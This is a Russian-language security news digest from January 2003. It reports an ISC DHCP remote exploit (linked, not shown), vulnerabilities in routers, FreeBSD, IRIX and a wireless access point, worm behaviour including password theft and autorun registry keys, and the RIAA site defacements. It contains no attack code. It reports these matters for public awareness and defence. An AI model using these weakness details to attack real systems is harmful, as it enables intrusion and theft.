Команда VOID.AT опубликовала эксплоит, позволяющий как локально, так и удалённо взломать сервер, на котором установлен сервер DHCP (динамическая раздача IP-адресов) от фирмы ISC (также выпускающей BIND - реализацию DNS-сервера). Технология применения эксплоита достаточно подробно описана в комментариях. Исходник - http://void.at/andi/hoagie_dhcpd.c
13/01/2003 11:18 Уязвимость в 5861 DSL-маршрутизаторе.
Greg Bolshaw сообщает об обнаружении уязвимости в DSL-маршрутизаторах серии 5861, выпускаемых фирмой Efficient Networks. Маршрутизаторы этого типа позиционируются фирмой в качестве DSL-роутеров, обеспечивающих доступ к сети от 100 и более пользователей. Обладают встроеными возможностями фильтрации (выполняют функции файрволлов) и дополнительными функциями для организации безопасных VPN-сетей. При использовании опции IP-фильтрации для блокирования пакетов с выставленным флагом TCP SYN попытка простого сканирования маршрутизатора со стороны WAN-интерфейса может привести к блокированию устройства с дальнейшей перезагрузкой. Тестировалась крайняя версия прошивки 5.3.80. ПРи сканировании использовались сканеры Nmap (Linux) и SuperScan (Windows). Источник - http://www.securityfocus.com
13/01/2003 10:10 Cайт RIAA снова взломали.
Похоже, взомы сайта Американской ассоциации звукозаписывающих компаний (RIAA) стали уже хорошей традицией. После двух предыдущих взломов, казалось бы, должен заставить технических специалистов (администраторов) врага музыкальных пиратов номер закрыть дыры в своем сайте. Однако 11 января сайт The Register сообщил о том, что сайт RIAA снова взломан, а на его страницах хакеры разместили собственную информацию, включая перечень "рекомендованных RIAA" файлобменных служб, куда вошли Kazaa и eDonkey. Эти службы, по сообщению хакеров, спонсируются RIAA. Над перечнем пиринговых сетей хакеры разместили собственные приветствия следующего вида: RIAA - 0wn3d by.... ;p oooh riaa want's to hack Filesharing Users / Servers ? - better lern to secure your own server... Sorry Admin - had to deactivate ur accounts - they'll be reactivated after 2 hours. greetz : Rage_X, BRAiNBUG, SyzL0rd, BSJ, PsychoD + all the others who want to stay anonymous :] wanna contact ? mailto:h4x0r0815@mail.ru. Судя по электронному адресу, вполне возможно, что не обошлось без наших ссотечественников. После того, как подмену главной страницы обнаружили, сервер RIAA был отключен от интернета. Это уже четвертый взлом сайта за последние несколько месяцев. Источник - http://www.compulenta.ru
12/01/2003 13:40 Статья "Криптография во FreeBSD и не только. Часть 1."
Хоть эта статья и была опубликована 27 декабря прошлого года, однако не утратила своего интереса и в нынешнем. Является переводом статьи Dru Lavigne, выполненным Станиславом Лапшанским. Представляет собой первую часть серии статей, посвящённых шифрованию данных, передаваемым по компьютерным сетям. Статья - http://www.softerra.ru/freeos/23045/page1.html
12/01/2003 13:24 Новые статьи на сайте Russian Linux Gazette.
Появились три новых статьи на сайте gazette.linux.ru.net. Статья Ивана Песина "Повесть об IP-адресации", статья Mike Orr "Глупости, которые мы делаем с нашими компьютерами" и статья Александра Куприна "Из жизни "джеков-HDD-потрошителей"... ". Рекомендуем почитать. Ссылка - http://gazette.linux.ru.net/news.html
12/01/2003 12:55 "Открытые" книги от издательства Prentice Hall.
Сайт linuxcenter.ru сообщает об свободном выпуске книг знаменитого компьютерного издательства Prentice Hall. Брюс Перенс (Bruce Perens) убедил издательство выпустить серию книг по лицензии Open Publication License (OPL) 1.0. Схема проста. "Бумажный" вариант книги можно приобрести в обычном порядке, с той лишь разницей, что каждый читатель имеет право видоизменять произведение, делать его копии и даже продавать их. Спустя несколько месяцев после начала продаж в Интернете появляется электронная версия. В настоящий момент по этому принципу уже выпущены две книги: Embedded Software Development with eCos и The Linux Development Platform. Третья книга из серии "Bruce Perens' Open Source Series" (а всего их будет от семи до девяти), "Intrusion Detection with SNORT", должна выйти в марте этого года. Перенс также ищет новых авторов, желающих опубликовать свои работы по лицензии Open Source. С предложениями можно обращаться по адресу: bruce@perens.com. Подробные ссылки приведены на сайте linuxcenter.ru. Подробности - http://www.linuxcenter.ru/news/
12/01/2003 12:32 Убийцы Владимира Сухомлина назвали заказчика.
Подозреваемые в убийстве известного интернет-журналиста Владимира Сухомлина дали показания и назвали заказчика убийства, сообщает "Интерфакс". Задержанные восьмого января в помещении первого горотдела милиции Балашихинского УВД Московской области сотрудник уголовного розыска и участковый уполномоченный первого горотдела милиции Балашихи дали показания, утверждая, что убийство Сухомлина было совершено ими по указанию директора ООО "Пласторг". По словам задержанных, "за избиение и убийство журналиста" им было обещано 1150 долларов США. Они рассказали следователям, что 4 января в 22:00 по московскому времени у дома номер 146 по Ленинскому проспекту, используя свое служебное положение, насильно посадили Сухомлина в автомашину ВАЗ-2111, принадлежащую одному из подозреваемых, и вывезли его на пустырь у дома номер два по Нарофоминской улице. Там они бейсбольной битой и ногами нанесли журналисту множественные удары по голове и телу. Затем они сфотографировали тело Сухомлина и впоследствии передали заказчику фотографии. По словам подозреваемых в убийстве принимал участие еще один человек, 1980 года рождения. Заказчик преступления, директор ООО "Пласторг", был задержан девятого января. Источник - http://www.lenta.ru
12/01/2003 12:06 Уточнённая и расширенная информация об уязвимости в драйверах Ethetrnet-адаптеров.
В ответ на многочисленные запросы, связанные с недавно обнаруженной уязвимостью в драйверах многих Ethernet-адаптеров (заполнение пакета при его длине меньше 46 байт важной системной информацией - мы сообщали об этом ранее), основатель группы Ofir Arkin The Sys-Security Group выложил в Интернете дополнительные данные об обнаруженной уязвимости. Тестирование проводилось самим Офиром в паре с Джошем Андерсоном. В статье также приводится ответ Microsoft, из которого следует, что написание некорректных (с точки зрения безопасности) сетевых драйверов лежит полностью на некооректной документации по программированию этих драйверов от Microsoft. Также авторы описали более подробно технологию получения важной критической информации на основании анализа сетевого траффика, подчеркнув при этом, что для полноценного анализа необходимо располагать довольно приличными знаниями сетевых технологий. Подробности - http://www.sys-security.com/archive/papers/More_information_regarding_Etherleak.txt
12/01/2003 11:34 Статья "TrinuxOid: Вскрытие дискеты".
На сайте securitylab.ru появилась статья Stalsen (stalsen@trinux.atanor.ru), посвящённая обзору мини-дистрибутивов (вроде Trinux или RTK), обзору их плюсов и минусов, а также способам их успешного применения и использования. Обзор автор решил начать с самого начала - с рассмотрения процесса загрузки Trinux версий 0.71 и 0.80rc2. Статья - http://www.securitylab.ru/?ID=35307
12/01/2003 11:11 Следующая версия Windows Server вновь переживает кризис идентификации.
В четверг Microsoft еще раз изменила наименование продукта, присвоив ему уже четвертое имя: Windows Server 2003. Предполагается, что последователь Windows 2000 Server поступит в продажу в апреле. В апреле 2001 года продукт, от рождения имевший кодовое название Whistler, получил имя Windows 2002 Server. Тогда же Microsoft впервые перенесла дату его выпуска на начало 2002 года. В августе компания переименовала серверное ПО на Windows .Net Server 2003, пообещав выпустить его в конце прошлого года. Наконец, в ноябре дата выпуска была перенесена в третий раз. Windows Server 2003 должен стать оплотом расширения стратегии веб-сервисов Microsoft. В декабре компания изменила условия лицензирования продукта, упростив компаниям лицензирование его как по числу пользователей, так и по числу машин. «Критика здесь вполне оправданна, — комментирует многократное изменение названия продукта аналитик Gartner Дэвид Смит (David Smith). — Но в общем-то все правильно. В долгосрочном плане это имеет смысл». На этой неделе Microsoft оповестила сотрудников и партнеров о переименовании, которое со временем затронет и другие продукты. Представительница Microsoft подтвердила, что продукты с .Net в названии, возможно, будут переименованы. «Цель в том, чтобы гарантировать отсутствие каких бы то ни было нарушений экосистемы», — подчеркнула она. Подробности - http://www.zdnet.ru/?ID=294077
11/01/2003 12:13 Программа, снимающая защиту от копирования Microsoft Reader.
По сообщению информационного портала ZDNET, в интернете появилась программа, позволяющая снимать защиту от копирования, встроенную в ПО чтения электронных книг Microsoft Reader. Это первый случай, когда подобная программа становится общедоступной. Программа Convert Lit выполняется в несколько этапов. Сначала производится обработка на том компьютере, где находится оригинал активированной версии файла e-book. После этого преобразованный файл можно переносить на другие компьютеры. На последнем этапе преобразования с файла снимаются все ограничения на копирование и использование, что позволяет многократно копировать и распространять его. Программу вместе с исходным кодом выложил британский программист Дэн Джексон (Dan Jackson). На своем сайте он заявляет, что вместе с ним работал создатель оригинального ПО [Microsoft Reader]. Сам Джексон называл собсвенную деятельность "ответом на серьезные недостатки ПО Reader". Со своей стороны Microsoft заявила, что знает о прогрмме и уже предупредила об этом издателей книг. Кроме того, представители Microsoft сказали, что не исключают возможность судебного преследования британского программиста Источник - http://www.viruslist.com
11/01/2003 12:07 Борцы за права потребителей выступили против DMCA.
Конгресс США рассматривает законопроект о защите прав потребителей, приобретающих продукцию, находящуюся под защитой авторских прав, передает Internetnews.com. Конгрессмены Рик Баучер (Rick Boucher) и Джон Дулиттл (John Doolittle) предложили внести две важные поправки в "Акт об авторских правах в цифровом тысячелетии" (Digital Millennium Copyright Act, DMCA), запрещающий обходить технические средства защиты доступа к продукции, находящейся под защитой авторских прав, даже если это делается с целью обеспечения прав потребителя. DMCA также запрещает разработку и продажу технологий, позволяющих обойти такие средства защиты. Подробности - http://dc.internet.com/news/article.php/1565901
11/01/2003 11:44 Microsoft: график прощания со старыми ОС.
31 декабря 2002 года Microsoft прекратил поддержку своих ОС Windows 95 и Windows NT 3.5x. Хотя оффлайновая поддержка была прекращена компанией более года назад, было сохранено некоторое количество онлайновых сервисов. Теперь прекращена разработка патчей, предназначенных конкретно для этих ОС, и пользователи остались без помощи со стороны Microsoft. Хотя прекращение поддержки этих ОС огорчит лишь небольшое число пользователей, имеющих старые или подержанные ПК, скорое отречение компании от других трех операционных систем заденет гораздо большее число владельцев компьютеров. И все же, в июне этого года Microsoft прекращает оффлайновую поддержку Windows 98, Windows 98 SE и Windows NT4, а окончательное прощание с этими системами должно произойти в июне 2004 года после закрытия связанных с ними онлайновых сервисов. У пользователей Windows Millennium время на раздумывание о переходе на более новые системы ограничено декабрем 2004 года, еще год для этой системы будет существовать онлайновая поддержка. И лишь те, кто работает в Windows XP Professional, могут пока спать спокойно: прощание с этой ОС у ее создателя намечено на декабрь 2008 года, поддержка же для Home Edition закончится в декабре 2007 года. Источник - http://www.vnunet.com/
11/01/2003 11:02 В Москве убит известный сетевой журналист.
В среду, 8 января 2003 г., в Москве было найдено тело известного интернет-журналиста, одного из основателей интернет-портала "Военно-исторический форум" (vif2.ru) Владимира Сухомлина. Об этом сообщает YTPO.ru. Двадцатитрехлетний Владимир Сухомлин был похищен 4 января из здания «Кипоплекса» на Ленинском проспекте, вывезен на окраину столицы и зверски убит киллерами. Как сообщает сайт «Военно-исторический форум», журналист заехал в «Киноплекс» на деловую встречу, жена осталась в машине — Владимир собирался пробыть внутри не более 20 минут. Обратно так и не вышел — вызванная милиция проверила здание, но его внутри не нашла. Мобильный телефон первые несколько минут после ухода был занят, потом стал недоступен — хотя с утра был заряжен и оплачен. По неофициальной информации YTPO.ru, преступники забили Владимира бейсбольными битами в одном из отдаленных московских микрорайнов на 30-градусном морозе… Убийцы были арестованы по горячим следам. Ими оказались действующие сотрудники милиции, получившие от заказчиков убийства журналиста $1200. В интересах следствия дополнительная информация не разглашается. Правоохранительные органы, уже проделавшие огромный объем работы, ведут поиск заказчиков и организаторов этого чудовищного злодеяния. Подробности - http://www.cnews.ru/topnews/2003/01/10/content7.shtml
11/01/2003 01:19 Вьетнам дает зеленый свет открытому коду
В Ханое прошел семинар по программному обеспечению, в котором приняли участие около 300 местных делегатов и ряд представителей зарубежных компаний. Участники встречи пришли к выводу, что переход на разработку ПО с открытым кодом позволит стране сэкономить значительные средства и лучше обеспечить информационную безопасность. В докладе, посвященном результатам семинара, отмечен недостаток опыта в области ПО с открытым кодом, поскольку большинство вьетнамских специалистов в компьютерной области начинали с применения какой- либо из версии Windows. Программное обеспечение с открытым кодом упомянуто в Государственном плане информационно-технологического развития Вьетнама. Ряд крупнейших ИТ-компаний страны начали проекты по разработке ПО с открытым кодом в рамках договоров с зарубежными партнерами; большинство операторов сайтов во Вьетнаме пользуются Linux-системами в качестве Web-серверов. Источник - Blif.Net
11/01/2003 01:15 Изследование TCP/IP с помошью TCPdump и Tethereal
Еще одна из статей январского выпуска LinuxGazette.com, демонстрирующая приминение таких инструментов как TCPdump и Tethereal при работе с протоколом TCP/IP. Статья - http://linuxgazette.com/issue86/vinayak.html
11/01/2003 01:05 Безопаснность с PHP Superglobals.
Под таким названием вышла новая статья на LinuxGazette.com. Автор статьи проводит анализ необходимости/безопасности использования Superglobals массивов в PHP 4. Ознакомиться - http://linuxgazette.com/issue86/lechnyr.html
11/01/2003 01:01 Релиз Linux Red Hat 8.1 намечен на апрель 2003.
По сообщениям с LinuxToday.com компания Red Hat намерена выпустить новую версию своего одноименного дистрибутива уже в апреле этого года. Подробноости - http://linuxtoday.com/news_story.php3?ltsn=2003-01-10-014-26-NW-DT-RH
11/01/2003 00:56 Выход Linux 2.5.56
Очередной релиз в нестабильной ветви ядра Linux как всегда прошел под девизом "лучше меньше да быстрее". На сей раз:- правки в sysctl документации
- множественные обновления в USB коде
- добавлена поддержка AES алгоритма
- исправлена exec_mmap()
и многое другое... ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.56
10/01/2003 14:26 Сетевой червь AVRON.
Cайт viruslist.ru информирует о появлении сетевого червя I-Worm.Avron. Распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам. Также копирует себя на все логические диски (включая сетевые). Содержит троянскую процедуру, ворующую пароли. Червь является приложением Windows (PE EXE-файл), написан на Microsoft Visual C++. Размер червя различен и зависит от его версии. Содержит ошибки и в некоторых случаях неработоспособен. При инсталляции червь копирует себя в системный каталог Windows со случайным именем, например: 2dadd52doc.ex, ef23h672.exe. Регистрирует этот файл в ключе авто-запуска системного реестра: HKLM\Software\Microsoft\Windows\CurrentVersion\Run (Mortimer = %имя файла червя%). При рассылке зараженных писем червь использует прямое подключение к SMTP-серверу. Адреса, по которым происходит рассылка, считывает из адресной книги Windows (WAB). Червь в своих письмах также случайно использует брешь в системе защиты "IFrame". Прочие письма рассылаются без "IFrame". При рассылке червь создаёт временный файл "NewBoot.sys" во временном каталоге Windows. Червь также создаёт в каталоге Windows файл "listrecp.dll" и записывает в него обнаруженные адреса электронной почты. Кроме того, обладает возможностью заражения через сеть, ICQ, IRC, и пиринговую сеть Kazaa. Червь считывает кешированные пароли и отправляет их на адрес "otto_psws@pochta.ws" в письме с заголовком "Password Got". Проявление - По 7-м и 24-м числам червь запускает процедуру, которая случайно перемещает курсор мыши и открывает Web-страницу: http://www.avril-lavigne.com. Подробности - http://www.viruslist.com/viruslist.html?id=1497055
10/01/2003 12:12 Статья "Основы сетевой безопасности Linux".
Rob Reilly на сайте LinuxPlanet представил широкой публике свою статью под названием "Admin Digest: The Basics of Linux Network Security", которая представляет собой фактически учебное пособие для администраторов, описывающее различные аспекты сетевой безопасности ОC Linux с практическими рекомендациями по защите обслуживаемого сервера. Собственно, ничего особо нового автор в статье не сказал, рекомендации обычные: закройте ненужные вам сервисы, используйте ssh, используйте программы мониторинга и проверки целостности системы, используйте файрволл. Опытные администраторы вряд ли найдут что-то новое для себя, но начинающим не мешало бы ознакомиться со статьёй. Статья - http://linuxplanet.com/linuxplanet/tutorials/211/1/
10/01/2003 11:54 Выход Linux 2.5.55.
Линус Торвальдс анонсировал выпуск очередной версии девелоперского ядра Linux - 2.5.55. Изменения в кодах систем и процессоров: arm, alpha, ppc, sparc, usb, isdn, dm, sysfs, knfsd. Changelog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.54
10/01/2003 11:30 Snort-Inline - усовершенствованный инструмент для Linux.
Проект Honeynet в настоящее время работает над технологией IDS Gateway, предназначенной для осуществления единого механизма управления данными. IDS Gateway сочетает в себе возможности NIDS (идентификация возможных сетевых атак по сигнатурам сетевых пакетов) с функциональностью файрволлов (блокирование траффика, не соответствующего определённым правилам). Примером подобной технологии может служить представляемый вашему вниманию пакет Snort-Inline. Представляет собой модифицированную версию IDS Snort 1.9, в результате чего пакет может не только фиксировать подозрительную сетевую активность, но также отбрасывать подозрительные пакеты и даже модицировать их. Проект Honeynet анонсировал выпуск инструментария Linux Snort-Inline Toolkit, включающего в себя прекомпилированные под Linux бинарники, документацию и cкрипт для генерации основных правил. Сайт проекта - http://www.honeynet.org/papers/honeynet/tools/
10/01/2003 10:12 Panda Software cообщает о появлении свежих вирусов.
Вирусная лаборатория Panda Software сообщила о появлении нового "червя" Lirva (W32/Lirva), о котором мы сообщали вчера, и "обновлении" старого - обнаружен N-вариант "червя" W32/Explorezip, распространяющегося по электронной почте. Распространение этого "червя" может носить быстрый и массовый характер. W32/Explorezip.N рассылает себя, используя MAPI-команды в почтовых программах MS Outlook, MS Outlook Express и MS Exchange. На компьютеры он попадает в электронном письме в файле, который называется zipped_files.exe. В отличие от своего предшественника, этот "червь" сжат с помощью UPX, и размер файла составляет 91,048 байта. W32/Explorezip является чрезвычайно деструктивным вирусом. Будучи однажды активирован, он отбирает файлы и документы на зараженной машине и уменьшает их до 0 байтов (как если бы они были опустошены или уничтожены). Далее он повторяет эту операцию каждые 30 минут. Это действие может на привести к невосполнимым потерям важной информации. В локальных сетях этот "червь" ищет доступ в папку Windows-машинах других пользователей и, обнаружив ее, копирует себя и изменяет WIN.INI файлы на этих машинах. Далее он активирует свою вредоносную загрузку, уменьшая размеры файлов. W32/Explorezip впервые появился в 1999 году и стал, подобно вирусу Melissa, одним из самых опасных и "дорогостоящих" для компаний. Источник - http://www.viruslab.ru
10/01/2003 09:43 Подробности взлома RIAA.
Cайт compulenta сообщает о подробностях взлома сайта Американской ассоциации звукозаписывающих компаний (RIAA), о котором мы сообщали ранее. Впрочем, назвать случившееся с сайтом RIAA взломом можно с очень большой натяжкой. Дело в том, что администраторы сервера попросту забыли или поленились закрыть паролем интерфейс для публикации новостей. В результате он стал доступен любому желающему, набравшему в браузере адрес системы публикации. Немудрено, что информация о дыре быстро распространилась по Сети, и многочисленные противники этой одиозной организации не упустили возможности надругаться над ненавистным им сайтом. Стоит отметить, что в определенной среде RIAA очень непопулярна из-за своих попыток борьбы с пиринговыми сетями и свободным распространением музыкальных файлов в Сети. На некомпетентность технического персонала RIAA обращает внимание и издание Wired News. В частности, оно указывает на то, что в течение полугода сайт RIAA пережил шесть успешных хакерских атак, которые завершались подменой главной страницы или отказом сервера обслуживать запросы. После атак в августе 2002 г. RIAA обновило серверное ПО. Однако не несовершенство программ является истинной причиной уязвимости сайта, считают в Wired News. Виной всему вопиющая безграмотность администраторов сервера, которые допускают грубейшие ошибки, решая самые элементарные задачи. Скриншоты - http://www.compulenta.ru/2003/1/9/36706/page2.html
9/01/2003 23:14 За сообщение на форуме — арест.
В Германии арестован человек, который опубликовал в интернете сообщение с одобрением терактов 11 сентября 2001 года. Сообщение, из-за которого Хольгер Восс может оказаться в тюрьме, было опубликовано в интернет-конференции сайта Telepolis. Сам арестованный утверждает, что его неправильно поняли: он лишь иронизировал. По словам Восса, в конце его электронного послания содержалась строка, которая давала ясно понять: весь этот текст — не более чем шутка. Впрочем, совершенно иного мнения придерживаются представители Фемиды: «Иронизировал ли он, или писал это всерьез — решать суду. Суд также решит, имеет ли значение в данном случае, что именно пытался сказать Хольгер Восс», — заявил BBC представитель суда города Мюнстер Юрген Вробель. Восс опубликовал сообщение, из-за которого начался скандал, в ответ на письмо завсегдатая конференции по имени Engine_of_Aggression. Тот писал об афганских повстанцах, воевавших против талибов на стороне США. «Я хочу поздравить народ, который в это сложное время вырвал зло с корнем», — писал Engine_of_Aggression. Восс, который считает себя пацифистом, ответил: «Да! И еще поздравим убийц-организаторов 9/11. Хорошо, что в тот день только несколько настоящих мужчин (!) рискнули показать американскому дьяволу, как на самом деле обстоят дела в мире». Источник - http://www.webplanet.ru/
9/01/2003 17:05 Вирусная двадцатка декабря 2002.
На сайте viruslist.ru опубликована традиционная вирусная двадцатка декабря ушедшего года. На первом месте по-прежнему червь Klez, набравший 24.74% От общего числа зарегистрированных инцидентов, на втором - червь Lentin c 10,93%, на третьем - макро-вирус Word97.Thus с 6.88% Подробности - http://www.viruslist.ru
9/01/2003 16:30 MessageLabs предупреждает об опасном вирусе Lirva (Naith).
Lirva (w32.Lirva@mm), известный также как Naith, стучится в почтовый ящик под видом приглашения поставить последнюю заплатку от Microsoft или зазывает посетить (причем, в эксклюзивном порядке) сайт поп-дивы Эврил Лавинь. Будучи активизирован, вирус пытается разослать свои копии по всем контактам в адресной книге, прекращает работу всех антивирусов и брандмауэров и запускает браузер с целью попасть на страничку вышеупомянутой дивы. Lirva использует печально известную уязвимость Iframe, так что на компьютере, где не был установлен соответствующий патч для MS Outlook, червяк запускается автоматически, даже если вложенный файл не был открыт. MessageLabs сообщает, что куски кода Lirva выглядят очень знакомо, так что не исключено, что это член известной семейки вирусов. Вот список тем писем, потенциально способных нести в себе новую заразу: Fw: Prohibited customers... Re: Brigade Ocho Free membership Re: According to Daos Summit Fw: Avril Lavigne - the best Re: Reply on account for IIS-Security Re: ACTR/ACCELS Transcriptions Re: The real estate plunger Fwd: Re: Admission procedure Re: Reply on account for IFRAME-Security breach Fwd: Re: Reply on account for Incorrect MIME-header. Информация взята с компьюленты. Подробности - http://www.messagelabs.com/viruseye/report.asp?id=124
9/01/2003 11:45 Статья "Windowx XP: действительно что-то новое или просто разукрашенная W2K?".
Е.А.Соболев на сайте softodrom.ru опубликовал статью, представляющую собой обзор комментариев, высказанных в ходе продолжающего сайтом опроса "почему вы не перешли на Windows XP?". В ней автор описал наиболее распространённые заблуждения относительно ОС WinXP, методы решения некоторых проблем в этой ОС, а также описал некоторые интересные особенности её. Статья - http://softodrom.ru/article/4/188_1.shtml
9/01/2003 11:22 Уязвимость в Windows 2000.
Как сообщает сайт www.bugtraq.ru, DoS (отказ в обслуживании) в w2k легко организуется посылкой неправильно сформированнных данных на 445 порт. В результате сервис LANMAN начинает со страшной силой поглощать ресурсы, вызывая высокую загрузку процессора. В приведённой ниже ссылке описываются подробности уязвимости, а также меры по её предотвращению. Подробности - http://online.securityfocus.com/bid/4532/info/
9/01/2003 11:06 Проект IEHK.
Valgasu из rstack.org сообщает об открытии на сайте http://valgasu.rstack.org нового проекта под названием IEHK (Internet Explorer Hacking Kit). Цель проекта - свести воедино многочисленные уязвимости, обнаруженные в различные годы, а также создать простой инструментарий (в виде набора Perl-скриптов) для исследования существующих уязвимостей. Для участия в проекте приглашаются все желающие. Сайт проекта - http://valgasu.rstack.org
9/01/2003 10:08 Уязвимость в версии Netscape в ОС IRIX.
Фирма SGI наконец-то выпустила бюллетень по безопасности, в котором констатируется факт наличия уязвимости в версии Netscape, идущей по умолчанию в соcтаве пакетов ОС IRIX. Самое примечательное, что это Netscape версии 4.77 :) Фирма пишет, что в этой версии обнаружены многочисленные уязвимости, которые можно эксплуатировать удалённо. Рекомендуется обновиться либо до версии Netscape 4.8, либо до IRIX 6.5.13. Кроме того, сообщается, что версия Netscape 4.8 будет портирована в феврале этого года. Подробности - http://www.sgi.com/support/security/
8/01/2003 18:14 Бен Ладен купил секретную американскую компьютерную программу Promis.
Усама Бен Ладен предположительно получил в свое распоряжение компьютерную программу Promis (производитель - компания Inslaw Inc.), позволяющую ему проникать в правительственные информационные сети США. По сообщению газеты The Washington Times, программы, созданные на базе разработок Inslaw Inc., используются, в частности, ФБР и ЦРУ. Если Бен Ладен действительно обладает Promis, то он может следить за действиями американских спецслужб, получать секретную информацию о стратегических объектах США, а также без проблем "отмывать" деньги. Как сообщается, сторонники Бен Ладена купили Promis на "черном рынке" в России. Это программное обеспечение могло попасть в Россию в результате действий супершпиона Роберта Ханссена\Robert Hanssen, занимавшего высокий пост в ФБР и в прошлом году американским судом приговоренного к пожизненному заключению за шпионаж в пользу СССР и России. За продажу программного обеспечения агентам российской разведки, Ханссен получил около $2 млн. Кроме Promis, Ханссен мог передать российской разведке информацию о кодах доступа в базы данных американских разведывательных служб. За ссылку спасибо Владимиру из Запорожья. :) Тем не менее, хотелось бы отметить (от себя), что подобное сообщение очень похоже на журналистскую утку или на сообщение обычно некомпетентных в подобных вещах журналистов (в качестве первоисточника на сайте приводится ссылка на www.washprofile.org). Честно говоря, в существование подобной программы верится с трудом. Подробности - http://www.crime-research.org/news/2003/01/0801.htm
8/01/2003 12:30 Интернет-броузер для MacOS X на основе KHTML.
На минувшем Macworld'е глава компании Aplle Стив Джобс представил новый интернет-броузер для OS X под кодовым названием Safari. Сейчас уже доступна бета-версия для OS X 10.2 (Jaguar). Стив также заверил всех, что Apple будет добросовестно следовать принципам openSource, и предоставит разработчикам KHTML свои исправления. Ранее Apple повзаимствовала у KDE скриптовый движок KJS. Подробности - http://linuxtoday.com/news_story.php3?ltsn=2003-01-07-022-26-OS-KE-SW
8/01/2003 12:20 Норвежский DVD-хакер оправдан.
Суд Осло снял все обвинения с 19-летнего норвежца Йона Йохансена (Jon Johansen), который взламывал коды, предназначенные для защиты от копирования записанных на DVD фильмов. Это решение суда может нанести удар по индустрии развлечений, которая использует кодирование как инструмент борьбы с видеопиратством в интернете. Миллионы человек уже используют интернет-сайты, такие как Kazaa и до недавнего времени Napster, для бесплатного скачивания любимых мелодий. Голливуд опасается, что исход дела в отношении Йона Йохансена может открыть дорогу к созданию подобных сайтов для бесплатного распространения фильмов. Четыре года назад Йохансен создал компьютерную программу под названием DeCSS. С ее помощью можно взломать шифр, который имеется на всех DVD, чтобы не допустить цифрового копирования содержащегося на этих дисках материала. Имея в своем распоряжении эту простенькую программу, любой человек, у которого есть современный компьютер, может запустить во "всемирную паутину" содержимое любого DVD лишь несколькими нажатиями на кнопку мышки. Источник - http://www.cnews.ru
8/01/2003 11:55 Локальная уязвимость в FreeBSD.
Как сообщает Joost Pol из Pine Digital Security, обнаружена локальная уязвимость в операционной системе FreeBSD, использование которой может привести как к DoS, так и к эскалации привилегий в системе. Связана эта уязвимость с ошибкой программирования в системной функции fpathconf(2), предназначенной для определения текущего значения лимитов ресурсов сконфигурированной системы, а также для опций переменных, связанных с путевым именем или дескриптором файла. В результате ошибки в этой функции отсутствует вызов функции fdrop(), таким образом постоянный вызов функции fpathconf может привести к переполнению счётчика ссылок на файловую стуктуру сокета, с которым работает вызывающая программа. Выпущенный вслед бюллетень по безопасности от разработчиков FreeBSD подвтердил наличие уязвимости и для всех версий ОС (ветви 4 и 5) был выпущен патч под названием SA-02:44.filedesc, который и рекомендуют применить. После обновления рекомендуется перекомпилировать ядро с дальнейшим перезапуском системы. Подробности - http://www.pine.nl/press/pine-cert-20030101.txt Патч - ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:44/filedesc.patch
8/01/2003 11:12 Статья "Безопасное программирование в .NET".
На сайте www.securitylab.ru опубликован перевод Михаила Разумова статьи с securityfocus под названием "Безопасное программирование в .NET". Приводим описание: "В основе .NET лежит цель объединения бизнеса, пользователей, приложений и данных. Однако, несмотря на все меры, принятые для защиты и секретности данных, многие люди и компании не спешат подключать свои бизнес-системы и предоставлять свои данные в доступ хакерам по всему миру. Microsoft понимает это беспокойство, связанное с ранними ее продуктами и технологиями, и сделала безопасность одним из высших приоритетов. Главный принцип при создании приложений - это использование системы безопасности структуры .NET. В этой статье мы представим обзор системы безопасности в структуре .NET и как создавать безопасные программы для .NET. И что более важно, мы обсудим, какие стандартные ошибки следует избегать". Ну что ж, будем надеяться, что этот перевод поможет программистам, пишущим (или собирающимся писать) свои приложения для платформы .NET. Cтатья - http://www.SecurityLab.ru/?ID=35224
8/01/2003 10:54 Уязвимость sendmail в IRIX.
Координационный центр по безопасности фирмы SGI сообщает об уязвимости версии sendmail, поставляемой в составе ОC IRIX. Первая из них связана с возможностью локального пользователя обойти ограничения оболочки smrsh и получением статуса суперпользователя. Вторая - с возможностью обмана проверки "check_relay" при помощи поддельных DNS-данных. Примечательно, что один из багов был обнаружен iDEFENSE аж 10 января прошлого года и в большинстве открытых ОС уже давно исправлен. Рекомендуется либо обновиться до версии ОС IRIX 6.5.19, либо применить патч за номером 4911. Источник - http://www.sgi.com/support/security/
8/01/2003 10:30 Уязвимость в WAP Longshine.
Lukas Grunwald из DN-Systems Enterprise Internet Solutions GmbH (Германия) cообщает об обнаруженной им уязвимости в устройстве доступа к беспроводной сети (WLAN Access Point) Longshine LCS-883R-AC-B c установленным ПО от Express Logic Inc. - ThreadX ARM7/Green Hills Version G3.0f.3.0c. По умолчанию в этом устройстве включён сервис TFTP (Trivial FTP), при этом любой злоумышленник может подключиться к серверу без авторизации и скачать кофигурационный файл config.img, содержащий критичные данные: секретное слово шифрования WEP, пароль сервера RADIUS, имя суперпользователя и его пароль, идентификатор SSID. Кроме этого можно также скачать другие критичные файлы: wbtune.dat, mac.dat, rom.img, normal.img. Источник - http://www.securityfocus.com
8/01/2003 10:02 Новые формы борьбы с киберпреступностью на Украине?
Владимир Голубев на украинском сайте, посвящённому обсуждению проблем борьбы с киберпреступностью (http://www.crime-research.org) опубликовал статью под названием "Новые формы информационного обмена и организация взаимодействия в борьбе с транснациональной компьютерной преступностью". Подобно многим революционным технологиям - компьютерные технологии несут в себе огромный потенциал, как для прогресса, так идля злоупотреблений. Атаки в сети, мошенничество, компьютерное пиратство, электронный шпионаж, распространение детской порнографией, хищение денежных средств с банковских счетов - вот только некоторые из преступлений, которые совершаются сегодня с использованием компьютерных систем. Особую озабоченность вызывает транснациональная компьютерная преступность, связанная с использованием глобальной сети Интернет. Cформулировав проблему и отметив её важность для обеспечения национальной безопасности государства, автор определяет задачи, которые возлагаются на "Центр исследования проблем компьютерных преступлений", функционирующий на базе представленного Вэб-сайта. Среди основных: организация информационного обмена и поиск эффективных методов борьбы с преступностью в сфере использования компьютерных технологий; повышение уровня информационной безопасности нашего государства на основе совершенствования организационно-правовой защиты информации в компьютерных системах; совершенствование путей предупреждения и расследования компьютерных преступлений; привлечение широкого круга научных работников и общественности к вопросам борьбы с преступлениями в сфере использования компьютерных технологий. Вот так вот скромно и со вкусом прорекламировали себя создатели сайта. :) В заключении хотелось бы заметить, что (цитирую) "Исследования Центра осуществляются при поддержке Центра по изучению транснациональной организованной преступности и 